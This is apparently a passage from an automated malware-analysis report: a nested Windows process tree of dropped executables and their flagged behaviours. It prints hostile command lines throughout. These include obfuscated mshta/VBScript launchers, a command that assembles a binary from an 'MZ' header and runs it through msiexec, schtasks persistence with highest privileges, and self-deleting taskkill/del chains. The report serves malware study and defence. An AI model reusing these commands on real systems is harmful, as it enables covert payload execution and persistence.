                                                                                                    PID:6044
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hpcxqvlq.c5v\GcleanerEU.exe /eufive & exit
                                                                                                      13⤵
                                                                                                        PID:5912
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\hpcxqvlq.c5v\GcleanerEU.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\hpcxqvlq.c5v\GcleanerEU.exe /eufive
                                                                                                          14⤵
                                                                                                            PID:4244
                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\31gai2kt.t0f\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                          13⤵
                                                                                                            PID:5872
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\31gai2kt.t0f\installer.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\31gai2kt.t0f\installer.exe /qn CAMPAIGN="654"
                                                                                                              14⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Enumerates connected drives
                                                                                                              • Modifies system certificate store
                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                              PID:2184
                                                                                                              • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\31gai2kt.t0f\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\31gai2kt.t0f\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635576763 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                15⤵
                                                                                                                  PID:6856
                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uaoazkmn.mbn\any.exe & exit
                                                                                                              13⤵
                                                                                                                PID:4164
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\uaoazkmn.mbn\any.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\uaoazkmn.mbn\any.exe
                                                                                                                  14⤵
                                                                                                                  • Loads dropped DLL
                                                                                                                  PID:5792
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\uaoazkmn.mbn\any.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\uaoazkmn.mbn\any.exe" -u
                                                                                                                    15⤵
                                                                                                                      PID:6740
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bq0ratlg.w2h\gcleaner.exe /mixfive & exit
                                                                                                                  13⤵
                                                                                                                    PID:3896
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\bq0ratlg.w2h\gcleaner.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\bq0ratlg.w2h\gcleaner.exe /mixfive
                                                                                                                      14⤵
                                                                                                                        PID:6388
                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dn0kvglo.ani\autosubplayer.exe /S & exit
                                                                                                                      13⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:4908
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        14⤵
                                                                                                                          PID:5504
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                              8⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:1232
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                              8⤵
                                                                                                              • Creates scheduled task(s)
                                                                                                              PID:4652
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\kh0SFMZ4hkf4Dl6r8mc9osop.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\kh0SFMZ4hkf4Dl6r8mc9osop.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4472
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 656
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:4524
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 672
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:4920
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 676
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:3480
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 680
                                                                                                              8⤵
                                                                                                              • Program crash
                                                                                                              PID:5328
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\ODY2Sr1zWSs82HM5t0_msyTh.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\ODY2Sr1zWSs82HM5t0_msyTh.exe"
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Checks processor information in registry
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                            PID:3900
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im ODY2Sr1zWSs82HM5t0_msyTh.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\ODY2Sr1zWSs82HM5t0_msyTh.exe" & del C:\ProgramData\*.dll & exit
                                                                                                              8⤵
                                                                                                                PID:6036
                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                  taskkill /im ODY2Sr1zWSs82HM5t0_msyTh.exe /f
                                                                                                                  9⤵
                                                                                                                  • Kills process with taskkill
                                                                                                                  PID:4932
                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                  timeout /t 6
                                                                                                                  9⤵
                                                                                                                  • Delays execution with timeout.exe
                                                                                                                  PID:4184
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\La5Vy50NmXgdPwbpOCWmV4Qt.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\La5Vy50NmXgdPwbpOCWmV4Qt.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                              PID:4776
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\j9goRrTjaicJ1rmr49TGWlDQ.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\j9goRrTjaicJ1rmr49TGWlDQ.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:5104
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\j9goRrTjaicJ1rmr49TGWlDQ.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\j9goRrTjaicJ1rmr49TGWlDQ.exe"
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4620
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4620 -s 1008
                                                                                                                  9⤵
                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                  • Program crash
                                                                                                                  PID:6848
                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\8VOjl7BEOlS8RQkh8g7zpIkq.exe
                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\8VOjl7BEOlS8RQkh8g7zpIkq.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Checks BIOS information in registry
                                                                                                              • Checks whether UAC is enabled
                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                              PID:4112
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c Mon1727c156c4abcec.exe
                                                                                                          5⤵
                                                                                                            PID:4004
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon1727c156c4abcec.exe
                                                                                                              Mon1727c156c4abcec.exe
                                                                                                              6⤵
                                                                                                                PID:3112
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon1727c156c4abcec.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon1727c156c4abcec.exe
                                                                                                                  7⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:428
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c Mon1708beae021a5ff.exe
                                                                                                              5⤵
                                                                                                                PID:1508
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
                                                                                                                5⤵
                                                                                                                  PID:3800
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon178d8e5d06822.exe
                                                                                                                    Mon178d8e5d06822.exe
                                                                                                                    6⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                    PID:3360
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:3924
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                        8⤵
                                                                                                                          PID:3452
                                                                                                                          • C:\Users\Admin\AppData\Roaming\3865150.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\3865150.exe"
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4804
                                                                                                                          • C:\Users\Admin\AppData\Roaming\7669804.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\7669804.exe"
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:3052
                                                                                                                          • C:\Users\Admin\AppData\Roaming\7866625.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\7866625.exe"
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks BIOS information in registry
                                                                                                                            • Checks whether UAC is enabled
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:5652
                                                                                                                          • C:\Users\Admin\AppData\Roaming\4710398.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\4710398.exe"
                                                                                                                            9⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:6032
                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                              "C:\Windows\System32\mshta.exe" vBSCRipt: CLosE ( CreaTEoBJeCT ( "WScRIPT.sHell" ).RUn ( "cMD.Exe /R COPY /Y ""C:\Users\Admin\AppData\Roaming\4710398.exe"" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x & if """" == """" for %c in ( ""C:\Users\Admin\AppData\Roaming\4710398.exe"" ) do taskkill -IM ""%~nxc"" -f " , 0 , TrUE ) )
                                                                                                                              10⤵
                                                                                                                                PID:5364
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /R COPY /Y "C:\Users\Admin\AppData\Roaming\4710398.exe" ..\FZkDRs9RSZN.Exe && sTArt ..\FZkDrs9RSZN.exe /PdmLkTgclA1F1vCuy4x& if "" == "" for %c in ( "C:\Users\Admin\AppData\Roaming\4710398.exe" ) do taskkill -IM "%~nxc" -f
                                                                                                                                  11⤵
                                                                                                                                    PID:5660
                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                      taskkill -IM "4710398.exe" -f
                                                                                                                                      12⤵
                                                                                                                                      • Kills process with taskkill
                                                                                                                                      PID:5296
                                                                                                                              • C:\Users\Admin\AppData\Roaming\1171292.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\1171292.exe"
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                PID:6104
                                                                                                                              • C:\Users\Admin\AppData\Roaming\8847422.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\8847422.exe"
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5236
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:3468
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:760
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:3228
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                9⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:3952
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4152
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:4244
                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                9⤵
                                                                                                                                  PID:4628
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                    10⤵
                                                                                                                                      PID:5072
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        11⤵
                                                                                                                                          PID:3800
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                          11⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:2292
                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                            "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                            12⤵
                                                                                                                                              PID:4224
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                13⤵
                                                                                                                                                  PID:4524
                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                12⤵
                                                                                                                                                  PID:2328
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                    13⤵
                                                                                                                                                      PID:5424
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                        14⤵
                                                                                                                                                          PID:5460
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                          14⤵
                                                                                                                                                            PID:5536
                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            msiexec -Y ..\lXQ2g.WC
                                                                                                                                                            14⤵
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            PID:400
                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                      taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                      11⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      PID:4964
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                8⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4328
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 792
                                                                                                                                                  9⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5784
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 804
                                                                                                                                                  9⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5932
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 808
                                                                                                                                                  9⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5340
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 816
                                                                                                                                                  9⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5988
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4328 -s 952
                                                                                                                                                  9⤵
                                                                                                                                                  • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:396
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
                                                                                                                                                8⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4464
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                                8⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                PID:4724
                                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 4724 -s 1508
                                                                                                                                                  9⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:5512
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                8⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Modifies system certificate store
                                                                                                                                                PID:4584
                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                  9⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                  PID:5628
                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                    10⤵
                                                                                                                                                    • Checks computer location settings
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    PID:1228
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7ffeb4a7dec0,0x7ffeb4a7ded0,0x7ffeb4a7dee0
                                                                                                                                                      11⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:5480
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff66a1e9e70,0x7ff66a1e9e80,0x7ff66a1e9e90
                                                                                                                                                        12⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:424
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --mojo-platform-channel-handle=1880 /prefetch:8
                                                                                                                                                      11⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      PID:3128
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --mojo-platform-channel-handle=1868 /prefetch:8
                                                                                                                                                      11⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                      PID:4632
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1820 /prefetch:2
                                                                                                                                                      11⤵
                                                                                                                                                        PID:3804
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2584 /prefetch:1
                                                                                                                                                        11⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        PID:4144
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1804,740044887856603922,14429926978779345541,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw1228_50700679" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2536 /prefetch:1
                                                                                                                                                        11⤵
                                                                                                                                                        • Checks computer location settings
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        PID:2180
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
